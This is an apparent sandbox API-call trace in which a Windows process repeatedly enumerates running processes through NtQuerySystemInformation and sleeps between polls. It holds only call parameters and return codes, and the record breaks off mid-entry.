[0121.915] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.915] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.917] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.918] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.931] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.932] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.935] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.936] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.947] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.947] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.951] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.961] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.961] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.962] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.965] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.980] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.980] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.980] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.983] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.984] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.992] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.993] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.993] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.993] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.994] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.996] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.997] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.008] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.009] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.009] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.011] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.012] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.037] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.038] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.040] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.040] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.055] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.055] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.056] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.056] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.056] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.059] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.060] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.070] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.071] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.075] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.076] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.086] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.087] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.087] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.090] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.091] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.102] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.102] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.102] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.103] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.105] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.106] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.117] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.117] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.118] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.118] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.121] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.121] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.133] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.134] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.136] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.137] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.148] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.150] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.152] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.152] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.164] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.167] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.167] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.180] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.180] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.180] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.181] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.183] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.183] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.195] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.195] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.196] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.196] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.197] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.199] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.199] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.211] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.212] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.212] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.216] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.217] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.226] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.227] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.227] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.230] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.230] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.243] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.244] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.244] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.246] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.247] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.257] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.258] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.258] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: 